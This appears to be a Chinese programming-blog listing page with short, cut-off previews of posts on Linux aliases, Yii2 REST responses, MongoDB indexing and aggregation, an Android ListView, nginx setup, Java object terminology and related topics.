设置命令的别名。在linux系统中如果命令太长又不符合用户的习惯,那么我们可以为它指定一个别名。虽然可以为命令建立“链接”解决长文件名的问 题,但对于带命令行参数的命令,链接就无能为力了。而指定别名则可以解决此类所有问题【1】。常用别名来简化ssh登录【见示例三】,使长命令变短,使常 用的长命令行变短,强制执行命令时询问等。 
  常用参数 
格式:alias 
格式:ali
    
                                
    • 
                                
  • yii2 restful web服务[格式响应]
                                    dcj3sjt126com
PHPyii2
                                    
    响应格式 
当处理一个 RESTful API 请求时, 一个应用程序通常需要如下步骤 来处理响应格式: 
 
 确定可能影响响应格式的各种因素, 例如媒介类型, 语言, 版本, 等等。 这个过程也被称为 content negotiation。 
 资源对象转换为数组, 如在 Resources 部分中所描述的。 通过 [[yii\rest\Serializer]]
    
                                
    • 
                                
  • MongoDB索引调优(2)——[十]
                                    eksliang
mongodbMongoDB索引优化
                                    
    转载请出自出处:http://eksliang.iteye.com/blog/2178555 一、概述 
      上一篇文档中也说明了,MongoDB的索引几乎与关系型数据库的索引一模一样,优化关系型数据库的技巧通用适合MongoDB,所有这里只讲MongoDB需要注意的地方 二、索引内嵌文档 
    可以在嵌套文档的键上建立索引,方式与正常
    
                                
    • 
                                
  • 当滑动到顶部和底部时,实现Item的分离效果的ListView
                                    gundumw100
android
                                    
    拉动ListView,Item之间的间距会变大,释放后恢复原样; 
 

package cn.tangdada.tangbang.widget;

import android.annotation.TargetApi;
import android.content.Context;
import android.content.res.TypedArray;
import andr
    
                                
    • 
                                
  • 程序员用HTML5制作的爱心树表白动画
                                    ini
JavaScriptjqueryWebhtml5css
                                    
    体验效果:http://keleyi.com/keleyi/phtml/html5/31.htmHTML代码如下: 
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="UTF-8" >
<ti
    
                                
    • 
                                
  • 预装windows 8 系统GPT模式的ThinkPad T440改装64位 windows 7旗舰版
                                    kakajw
ThinkPad预装改装windows 7windows 8
                                    
      
该教程具有普遍参考性,特别适用于联想的机器,其他品牌机器的处理过程也大同小异。 
该教程是个人多次尝试和总结的结果,实用性强,推荐给需要的人! 
  
缘由 
小弟最近入手笔记本ThinkPad T440,但是特别不能习惯笔记本出厂预装的Windows 8系统,而且厂商自作聪明地预装了一堆没用的应用软件,消耗不少的系统资源(本本的内存为4G,系统启动完成时,物理内存占用比
    
                                
    • 
                                
  • Nginx学习笔记
                                    mcj8089
nginx
                                    
    一、安装nginx                      1、在nginx官方网站下载一个包,下载地址是:  
http://nginx.org/download/nginx-1.4.2.tar.gz  
     2、WinSCP(ftp上传工
    
                                
    • 
                                
  • mongodb 聚合查询每天论坛链接点击次数
                                    qiaolevip
每天进步一点点学习永无止境mongodb纵观千象
                                    
    /* 18 */
{
    "_id" : ObjectId("5596414cbe4d73a327e50274"),
    "msgType" : "text",
    "sendTime" : ISODate("2015-07-03T08:01:16.000Z"
    
                                
    • 
                                
  • java术语(PO/POJO/VO/BO/DAO/DTO)
                                    Luob.
DAOPOJODTOpoVO BO
                                    
    
PO(persistant object) 持久对象
在o/r 映射的时候出现的概念,如果没有o/r映射,就没有这个概念存在了.通常对应数据模型(数据库),本身还有部分业务逻辑的处理.可以看成是与数据库中的表相映射的java对象.最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合.PO中应该不包含任何对数据库的操作.

VO(value object) 值对象
通
    
                                
    • 
                                
  • 算法复杂度
                                    Wuaner
Algorithm
                                    
    Time Complexity & Big-O: 
 
http://stackoverflow.com/questions/487258/plain-english-explanation-of-big-o 
 
http://bigocheatsheet.com/ 
 
http://www.sitepoint.com/time-complexity-algorithms/ 
 
 

    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他